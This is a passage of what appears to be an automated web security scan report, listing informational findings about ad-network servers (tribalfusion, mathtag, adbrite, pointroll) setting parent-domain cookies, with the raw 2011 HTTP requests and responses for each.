Connection: keep-alive
Content-Length: 60

var e9;
if (e9.displayAdFlag == true) {
e9.displayAd();
}
8.6. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=300x250&p=6869973&a=2&flashVer=10&ver=1.20&center=1&addBlockingCategories=Survey|Pop-up|Pop-under|Expandable|Audio|Full-page|Floating|Warning&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6884586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aCntPLO5nZclSE04SQm2X4By88RFFAT03pBuZddHX9UZaZbxujf7rOoybSWIIlj9T71qT7HTFCxEn5rmJjQGIweoYhL7ZcIC46GpoZb0xIxTAFPOWMv0yjjT0DfRmBx7FCOQANcUZcfGgPWejOqO0SAI54ZctxfPcR8iJyjyRw0jNxklmN9DO56PeZbtgSyke8ifZbyolE1wKvZblCmj877varrWIm6OOUmuodrNpbOcEkcvh4HWyZaEVgfD1ei9kXF2kKvKiZbujrlTWZaikFfA7FlrsR5pPLZaGIr3cm7eIMeEDHSj1eGQqHYmZagwfQZcIdZchkGiiZcp9VxgZcRdcnD4lAQe5WW3Bw0USJUuuNpkjXF689ZdpEO3YoXOZaBXZbpx79scc0Zb4LFDeBaA7EZc5HLLeGu23sria8EtmpTUy0x5RC7cZc05samZcaxJcsisCbtj0gg2AcVvfZc88q7pDQTfJ0OCIWLj54FOnLEOpFIZdsSTZd9xmDBdvpDXTEIfulbw4opYeACDD6UU657PNkKoIXNw8IJxPeHv63Ds7Zd7B9eo3uwhvNphv7oNYZbPwgHsuATcxmmd5IGFR4Tmew9woN2MJFE9XW26MABjFeYQu0HPWCfgpJfynY8tCX6XDm7mfBB1fZcnAK2qm4JmbW2SOjtT3uQx2VDtlabL28jFVdLsAB9ZcZbI9uJdvgEavoeH6W29PxmyLyyeN5LtYsvIoI5Cy2AoqNIG0DOPsdbshQZaU0j5Uf86QlDd0HxEZdsALr7okDZdJw2kr9N4dIUcuntgfaYcsquI6y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 187

document.write('<iframe src="http://routenote.com/blog/TFadvertising/300.htm" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
8.7. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm/rtb/COFC/1008A2/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm/rtb/COFC/1008A2/imp?ci=&li=&pe=&pt=&pi=&sc=&ct=&vi=&px=&su= HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207074

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7846 30790
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1305207201; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;
8.8. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.9. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
8.10. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1808
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-4033-E2F7-1209-9890000A0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:2|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:2|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGi:1|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX6:1|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
